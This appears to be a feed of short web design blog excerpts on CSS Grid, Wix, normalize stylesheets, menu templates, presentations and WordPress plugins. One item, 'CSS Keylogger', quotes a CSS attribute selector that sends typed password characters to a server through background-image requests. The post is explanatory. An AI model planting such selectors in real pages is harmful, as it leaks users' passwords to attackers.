13 Best Ways to Learn CSS Grid

CSS Grid an increasingly popular method for creating complex responsive web design layouts that render more consistently across browsers. Now is the time to familiarize yourself with CSS Grid, so we’ve collected 13 of the best ways to get started learning today. Rather than old-school methods such as tables or the box model, CSS Grid […]
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Wix Code Review: Building Web Apps With Ease

One of the common problems most front-end web designers face is building the back-end of website projects. Usually, designers have to team up with web developers to work on projects such as web apps and eCommerce platforms. What if there was a way to easily design both the front-end and back-ends of websites such as […]
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Frank Chimero published a new talk-turned-essay, Everything Easy is Hard Again.

May we all be as wonderfully self-reflective and eloquent as Frank one day. There is a lot there, so please read it. Part of the theme is that web design and development has seemingly repetitive cycles that can kick even quite experienced people back down the ladder:

I don’t feel much better at making [websites] after 20 years. My knowledge and skills develop a bit, then things change, …

Complexity is a post from CSS-Tricks

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30+ Best Food & Drink Menu Templates

Using a pre-made menu template can be a great starting point for your restaurant or cafe. This is our collection of the best food and drink menu templates out there, to give you some delicious inspiration! If you’re a restaurant owner or a designer working for the food industry, it can be helpful to start […]
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How to Design a Professional PowerPoint Presentation

Our series of tips on presentation design outlined some generic rules and ideas that you can live by to create better, more professional presentations. Today we want to follow that up by taking you through the actual process of designing a presentation from start to finish. We’ll break down every step of the design process, […]
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Another don’t call it a reset from Sindre Sorhus. It’s a port of Normalize that, as the name suggests, is modernized to remove some of the older stuff and add a few opinionated bits. I’m good with light sensible opinions, like in this case, box-sizing: border-box; everywhere. This looks similar to sanitize.css which is also based on Normalize and brings a few more sensible opinions. Same with Reboot.

If you’re interested in some of the history and thinking behind …

modern-normalize is a post from CSS-Tricks

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CSS Keylogger

Scary little attack using essentially a bunch of attribute selectors like this:

input[type="password"][value$="a"] {
background-image: url("https://localhost:3000/a");

At first, I was like wait a minute, you can’t select inputs based on what people type in them but only what’s set on the attribute itself. Max Chehab shows how it is possible, however, because React uses “controlled components” that do this by default. Not to mention you can apply the typed value to the attribute easily like:

const inp =

CSS Keylogger is a post from CSS-Tricks

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WordPress Plugins: How Many is Too Many?

There are tons of reasons why WordPress plugins are a necessity. They offer a ton of features and functionality that your site doesn’t have otherwise. With plugins, you can customize the site you’ve already built to better suit your needs and serve your visitors. But you’ve probably heard that having too many WordPress plugins on …
The post WordPress Plugins: How Many is Too Many? appeared first on Torque.
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